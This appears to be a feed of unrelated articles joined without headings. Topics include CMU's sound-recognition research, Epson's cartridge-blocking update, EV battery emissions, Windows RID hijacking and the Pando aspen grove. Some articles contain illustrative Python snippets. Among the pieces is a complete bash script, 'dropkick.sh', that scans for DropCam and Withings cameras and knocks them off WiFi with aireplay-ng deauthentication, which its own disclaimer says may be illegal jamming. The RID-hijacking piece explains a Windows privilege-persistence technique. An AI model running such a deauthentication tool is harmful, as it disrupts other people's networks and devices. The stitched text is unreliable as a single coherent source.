The researchers, based at Carnegie Mellon University in the US, refer to their project as “Ubicoustics” because of the ubiquity of microphones in modern computing devices.
As they observe in their paper, “Ubicoustics: Plug-and-Play Acoustic Activity Recognition,” real-time sound evaluation to classify activities and context is an ongoing area of investigation. What CMU’s comp sci types have added is a sophisticated sound-labeling model trained on high-quality sound effects libraries, the sort used in Hollywood entertainment and electronic games.
As good as you and me
Sound-identifying machine-learning models built using these audio effects turn out to be more accurate than those trained on acoustic data mined from the internet, the boffins claim. “Results show that our system can achieve human-level performance, both in terms of recognition accuracy and false positive rejection,” the paper states.
The researchers report accuracy of 80.4 per cent in the wild. So their system misclassifies about one sound in five. While not quite good enough for deployment in people’s homes, it is, the CMU team claims, comparable to a person trying to identify a sound. And its accuracy rate is close to other sound recognition systems such as BodyScope (71.5 per cent) and SoundSense (84 per cent). Ubicoustics, however, recognizes a wider range of activities without site-specific training.
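The team’s actual pipeline is a deep model trained on professional sound-effect libraries, but the basic shape of acoustic activity recognition (featurize a short audio window, then match it against labeled sound classes) can be sketched with a toy nearest-centroid classifier. Everything below, from the class names to the features, is illustrative rather than the authors’ code:

```python
import numpy as np

def spectral_features(signal: np.ndarray, n_bands: int = 8) -> np.ndarray:
    """Crude spectral-energy features: magnitude spectrum pooled into bands."""
    spectrum = np.abs(np.fft.rfft(signal))
    bands = np.array_split(spectrum, n_bands)
    feats = np.array([b.mean() for b in bands])
    return feats / (feats.sum() + 1e-9)  # normalize so volume doesn't dominate

# Toy "sound effect library": synthetic clips standing in for labeled recordings.
sr = 8000
t = np.linspace(0, 1, sr, endpoint=False)
library = {
    "running_water": np.random.default_rng(0).normal(size=sr),  # noise-like
    "microwave_beep": np.sin(2 * np.pi * 1000 * t),             # tonal
}
centroids = {label: spectral_features(clip) for label, clip in library.items()}

def classify(clip: np.ndarray) -> str:
    """Nearest-centroid match of an incoming audio window."""
    f = spectral_features(clip)
    return min(centroids, key=lambda lbl: np.linalg.norm(f - centroids[lbl]))

# A fresh 1 kHz tone should land on the tonal class.
print(classify(np.sin(2 * np.pi * 1000 * t)))  # microwave_beep
```

On this toy data the match is trivial; the real system’s contribution is doing it robustly across hundreds of everyday sound classes without per-site training.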
Alexa to the rescue
Alexa, informed by this model, could in theory hear if you left the water running in your kitchen and might, given the appropriate Alexa Skill, take some action in response, like turning off your smart faucet or ordering a boat from Amazon.com to navigate around your flooded home. That is, assuming it didn’t misinterpret the sound in the first place.
The researchers suggest their system could be used, for example, to send a notification when a laundry load finished. Or it might promote public health: By detecting frequent coughs or sneezes, the system “could enable smartwatches to track the onset of symptoms and potentially nudge users towards healthy behaviors, such as washing hands or scheduling a doctor’s appointment.”
Printer maker Epson is under fire this month from activist groups after a software update prevented customers from using cheaper, third party ink cartridges. It’s just the latest salvo in a decades-long effort by printer manufacturers to block consumer choice, often by disguising printer downgrades as essential product improvements.
For several decades now printer manufacturers have lured consumers into an arguably terrible deal: shell out a modest sum for a mediocre printer, then pay an arm and a leg for replacement printer cartridges that cost relatively little to actually produce.
Unsurprisingly, this resulted in a booming market for discount cartridges and refillable alternatives. Just as unsurprisingly, major printer vendors quickly set about trying to kill this burgeoning market via all manner of lawsuits and dubious behavior.
Initially, companies like Lexmark filed all manner of unsuccessful copyright and patent lawsuits against third-party cartridge makers. When that didn’t work, hardware makers began cooking draconian restrictions into printers, ranging from unnecessary cartridge expiration dates to obnoxious DRM and firmware updates blocking the use of “unofficial” cartridges.
As consumer disgust at this behavior has grown, printer makers have been forced to get more creative in their efforts to block consumer choice.
HP, for example, was widely lambasted back in 2016 when it deployed a “security update” that did little more than block the use of cheaper third-party ink cartridges. HP owners who dutifully installed the update suddenly found their printers wouldn’t work if they’d installed third-party cartridges, forcing them back into the arms of pricier, official HP cartridges.
Massive public backlash forced HP to issue a flimsy mea culpa and reverse course, but the industry doesn’t appear to have learned its lesson quite yet.
The Electronic Frontier Foundation now says that Epson has been engaged in the same behavior. The group says it recently learned that in late 2016 or early 2017, Epson issued a “poison pill” software update that effectively downgraded user printers to block third party cartridges, but disguised the software update as a meaningful improvement.
The EFF has subsequently sent a letter to Texas Attorney General Ken Paxton, arguing that Epson’s lack of transparency can easily be seen as “misleading and deceptive” under Texas consumer protection laws.
“When restricted to Epson’s own cartridges, customers must pay Epson’s higher prices, while losing the added convenience of third party alternatives, such as refillable cartridges and continuous ink supply systems,” the complaint notes. “This artificial restriction of third party ink options also suppresses a competitive ink market and has reportedly caused some manufacturers of refillable cartridges and continuous ink supply systems to exit the market.”
Epson did not immediately return a request for comment.
Activist, author, and EFF member Cory Doctorow tells Motherboard that Epson customers in other states who were burned by the update should contact the organization. That feedback will then be used as the backbone for additional complaints to other state AGs.
“Inkjet printers are the trailblazers of terrible technology business-models, patient zero in an epidemic of insisting that we all arrange our affairs to benefit corporate shareholders, at our own expense,” Doctorow told me via email.
Doctorow notes that not only is this kind of behavior sleazy, it undermines security by eroding consumer faith in the software update process, especially given that some printers can be easily compromised and used as an attack vector into the rest of the home network.
“By abusing the updating mechanism, Epson is poisoning the security well for all of us: when Epson teaches people not to update their devices, they put us all at risk from botnets, ransomware epidemics, denial of service, cyber-voyeurism and the million horrors of contemporary internet security,” Doctorow said.
“Infosec may be a dumpster-fire, but that doesn’t mean Epson should pour gasoline on it,” he added.
There have been a few too many stories lately of AirBnB hosts caught spying on their guests with WiFi cameras, using DropCam cameras in particular. Here’s a quick script that will detect two popular brands of WiFi cameras during your stay and disconnect them in turn. It’s based on glasshole.sh. It should do away with the need to rummage around in other people’s stuff, racked with paranoia, looking for the things.
Thanks to Adam Harvey for giving me the push, not to mention for naming it.
For a plug-and-play solution in the form of a network appliance, see Cyborg Unplug.
#!/bin/bash
#
# DROPKICK.SH
#
# Detect and Disconnect the DropCam and Withings devices some people are using to
# spy on guests in their home, especially in AirBnB rentals. Based on Glasshole.sh:
#
#     http://julianoliver.com/output/log_2014-05-30_20-52
#
# This script was named by Adam Harvey (http://ahprojects.com), who also
# encouraged me to write it. It requires a GNU/Linux host (laptop, Raspberry Pi,
# etc) and the aircrack-ng suite. I put 'beep' in there for a little audio
# notification. Comment it out if you don't need it.
#
# See also http://plugunplug.net, for a plug-and-play device that does this
# based on OpenWrt. Code here:
#
#     https://github.com/JulianOliver/CyborgUnplug
#
# Save as dropkick.sh, 'chmod +x dropkick.sh' and exec as follows:
#
#     sudo ./dropkick.sh <WIRELESS NIC> <BSSID OF ACCESS POINT>

shopt -s nocasematch # Set shell to ignore case
shopt -s extglob     # For non-interactive shell.

readonly NIC=$1   # Your wireless NIC
readonly BSSID=$2 # Network BSSID (AirBnB WiFi network)
readonly MAC=$(/sbin/ifconfig | grep $NIC | head -n 1 | awk '{ print $5 }')
# MAC=$(ip link show "$NIC" | awk '/ether/ {print $2}') # If 'ifconfig' not
# present.
readonly GGMAC='@(30:8C:FB*|00:24:E4*)' # Match against DropCam and Withings
readonly POLL=30 # Check every 30 seconds
readonly LOG=/var/log/dropkick.log

airmon-ng stop mon0  # Pull down any lingering monitor devices
airmon-ng start $NIC # Start a monitor device

while true;
    do
        for TARGET in $(arp-scan -I $NIC --localnet | grep -o -E \
            '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}')
            do
                if [[ "$TARGET" == "$GGMAC" ]]
                    then
                        # Audio alert
                        beep -f 1000 -l 500 -n 200 -r 2
                        echo "WiFi camera discovered: "$TARGET >> $LOG
                        aireplay-ng -0 1 -a $BSSID -c $TARGET mon0
                        echo "De-authed: "$TARGET" from network: "$BSSID >> $LOG
                        echo '
     __              __   _     __        __
 ___/ /______  ___  / /__ (_)___/ /_____ ___/ /
 / _  / __/ _ \/ _ \/ _//  / __/ _/ -_) _  /
 \_,_/_/  \___/ .__/_/\_\/_/\__/_/\_\\__/\_,_/
             /_/
                        '
                    else
                        echo $TARGET": is not a DropCam or Withings device. Leaving alone.."
                fi
            done
        echo "None found this round."
        sleep $POLL
done

airmon-ng stop mon0
Disclaimer
For the record, I’m well aware DropCam and Withings are also sold as baby monitors and home security products. The very fact this code exists should challenge you to reconsider the non-sane choice to rely on anything wireless for home security. More so, WiFi jammers – while illegal – are cheap. If you care, use cable.
It may be illegal to use this script in the US. Due to changes in FCC regulation in 2015, it appears intentionally de-authing WiFi clients, even in your own home, is now classed as ‘jamming’. Up until recently, jamming was defined as the indiscriminate addition of noise to signal – still the global technical definition. It’s worth noting here that all wireless routers necessarily ship with the ability to de-auth, as part of the 802.11 specification.
All said, use of this script is at your own risk. Use with caution.
Every major carmaker has plans for electric vehicles to cut greenhouse gas emissions, yet their manufacturers are, by and large, making lithium-ion batteries in places with some of the most polluting grids in the world.
By 2021, capacity will exist to build batteries for more than 10 million cars running on 60 kilowatt-hour packs, according to data from Bloomberg NEF. Most supply will come from places like China, Thailand, Germany and Poland that rely on non-renewable sources like coal for electricity.
Not So Green?
Year 1 includes manufacturing-stage emissions. Predictions based on carbon tailpipe emissions and energy mix in 2017.
Source: Berylls Strategy Advisors
“We’re facing a bow wave of additional CO2 emissions,” said Andreas Radics, a managing partner at Munich-based automotive consultancy Berylls Strategy Advisors, which argues that for now, drivers in Germany or Poland may still be better off with an efficient diesel engine.
The findings, among the more bearish ones around, show that while electric cars are emission-free on the road, they can still be responsible for much of the carbon dioxide that conventional cars emit, once manufacturing is taken into account.
Just to build each car battery—weighing upwards of 500 kilograms (1,100 pounds) for sport-utility vehicles—would emit up to 74 percent more CO2 than producing an efficient conventional car, if the battery is made in a factory powered by fossil fuels in a place like Germany, according to Berylls’ findings.
[…]
Just switching to renewable energy for manufacturing would slash emissions by 65 percent, according to Transport & Environment. In Norway, where hydro-electric energy powers practically the entire grid, the Berylls study showed electric cars generate nearly 60 percent less CO2 over their lifetime, compared with even the most efficient fuel-powered vehicles.
As it is now, manufacturing an electric car pumps out “significantly” more climate-warming gases than a conventional car, which releases only 20 percent of its lifetime CO2 at this stage, according to estimates from Mercedes-Benz’s electric-drive system integration department.
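The underlying accounting is a break-even calculation: an electric car starts life with a larger manufacturing carbon debt, then repays it (or doesn't) per kilometre depending on how clean the charging grid is. A toy model with illustrative round numbers, not Berylls' actual figures:

```python
def lifetime_co2(manufacturing_kg: float, per_km_kg: float, km: float) -> float:
    """Total lifecycle CO2: one-time manufacturing emissions plus driving."""
    return manufacturing_kg + per_km_kg * km

# Illustrative round numbers (not from the study): a diesel vs. an EV with a
# heavy battery carbon debt, charged on a coal-heavy grid and on a clean grid.
diesel = lifetime_co2(manufacturing_kg=6_000, per_km_kg=0.12, km=150_000)
ev_coal = lifetime_co2(manufacturing_kg=12_000, per_km_kg=0.10, km=150_000)
ev_hydro = lifetime_co2(manufacturing_kg=12_000, per_km_kg=0.01, km=150_000)
print(diesel, ev_coal, ev_hydro)  # 24000.0 27000.0 13500.0
```

With these made-up inputs, the EV on a coal-heavy grid ends its life having emitted more CO2 than the diesel, while the same EV on a hydro grid emits far less, which is the pattern the study describes.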
A security researcher from Colombia has found a way of assigning admin rights and gaining boot persistence on Windows PCs that’s simple to execute and hard to stop – all the features that hackers and malware authors are looking for in an exploitation technique.
What’s more surprising is that the technique was first detailed way back in December 2017, yet despite its numerous benefits and ease of exploitation, it has received neither media coverage nor been seen employed in malware campaigns.
Discovered by Sebastián Castro, a security researcher for CSL, the technique targets one of the parameters of Windows user accounts known as the Relative Identifier (RID).
The RID is a code added at the end of account security identifiers (SIDs) that describes that user’s permissions group. There are several RIDs available, but the most common ones are 501 for the standard guest account, and 500 for admin accounts.
Image: Sebastian Castro
Castro, with help from CSL CEO Pedro García, discovered that by tinkering with registry keys that store information about each Windows account, he could modify the RID associated with a specific account and grant it a different RID, for another account group.
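A Windows SID is a structured identifier whose final field is the RID, so the swap Castro describes is conceptually a one-field edit. Here is a toy illustration of the format only; it manipulates the SID's string form, not the binary SAM data in the registry that the real attack modifies:

```python
def swap_rid(sid: str, new_rid: int) -> str:
    """Replace the trailing RID of a SID string, e.g. relabel a guest
    account (RID 501) with the built-in admin RID (500)."""
    prefix, _, _old_rid = sid.rpartition("-")
    return f"{prefix}-{new_rid}"

# A hypothetical guest-account SID; only the final field changes.
guest_sid = "S-1-5-21-1004336348-1177238915-682003330-501"
print(swap_rid(guest_sid, 500))
# S-1-5-21-1004336348-1177238915-682003330-500
```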
The technique does not allow a hacker to remotely infect a computer unless that computer has been foolishly left exposed on the Internet without a password.
But in cases where a hacker has a foothold on a system –via either malware or by brute-forcing an account with a weak password– the hacker can give admin permissions to a compromised low-level account, and gain a permanent backdoor with full SYSTEM access on a Windows PC.
Since registry keys are boot persistent, any modifications made to an account’s RID remain in place until fixed.
The attack is also very reliable: it has been tested and found to work on Windows versions from XP to 10 and from Server 2003 to Server 2016, and even older versions should be vulnerable, at least in theory.
“It is not so easy to detect when exploited, because this attack could be deployed by using OS resources without triggering any alert to the victim,” Castro told ZDNet in an interview last week.
“On the other hand, I think [it] is easy to spot when doing forensics operations, but you need to know where to look.
“It is possible to find out if a computer has been a victim of RID hijacking by looking inside the [Windows] registry and checking for inconsistencies on the SAM [Security Account Manager],” Castro added.
The Pando aspen grove, located in central Utah, is the largest organism on the planet by weight. From the surface, it may look like a forest that spans more than 100 U.S. football fields, but each tree shares the exact same DNA and is connected to its clonal brethren through an elaborate underground root system. Although not quite as large in terms of area as the massive Armillaria gallica fungus in Michigan, Pando is much heavier, weighing in at more than 6 million kilograms. Now, researchers say, the grove is in danger, being slowly eaten away by mule deer and other herbivores—and putting the fate of its ecosystem in jeopardy.
“This is a really unusual habitat type,” says Luke Painter, an ecologist at Oregon State University in Corvallis who was not involved with the research. “A lot of animals depend on it.”
Aspen forests such as the Pando grove and many others reproduce in two ways. The first is the familiar system in which mature trees drop seeds that grow into new trees. But more commonly, aspen and some other tree species reproduce by sending out sprouts from their roots, which grow up through the soil into entire new trees. The exact amount of time it took the Pando grove to reach its modern extent is unknown, says Paul Rogers, an ecologist at Utah State University in Logan. “However, it’s very likely that it’s centuries old, and it’s just as likely that it’s millennia old.”
Scientists first noticed the Pando shrinking in the late ’90s. They suspected elk, cattle, and most prominently deer were eating the new shoots, so in the new study Rogers and colleagues divided the forest into three experimental groups. One section was completely unfenced, allowing animals to forage freely on the baby aspen. A second section was fenced and left alone. And a third section was fenced and then treated in some places with strategies to spur aspen growth, such as shrub removal and controlled burning; in other places it was left untreated.
Aerial photos of the Pando grove spanning 1939 to 2011, which show the grove thinning over time
USDA Aerial Photography Field Office, Salt Lake City, Utah
The good news, at least for Pando, is that it appears that keeping out the deer is enough to solve the problem. But fencing the entirety of the grove is neither practical nor palatable, says Rogers, who partners with the U.S. Forest Service’s Rocky Mountain Research Station in Fort Collins, Colorado, as part of the Western Aspen Alliance, a group committed to improving aspen management and restoring their ecosystems. “Everybody, including myself, doesn’t want fences around this iconic grove. We don’t want to go to nature to see a bunch of fences.”
The alternative, he says, is to do something about the mule deer population. The thinning of the forest has only started to occur in the past century or so. This time frame roughly coincides with when humans entered the area, building cabins, banning hunting, and removing carnivores like wolves that would ordinarily prey on the deer. These human activities, Rogers says, have turned Pando into a safe haven for the deer, artificially inflating their numbers in the area.
With the new data in hand, he’s planning to advocate for a culling of the deer population in the area. Although that may seem extreme, it may be the only way to give Pando a chance at long-term survival. “The real problem,” Rogers says, “is that there are too many mouths to feed in this area.”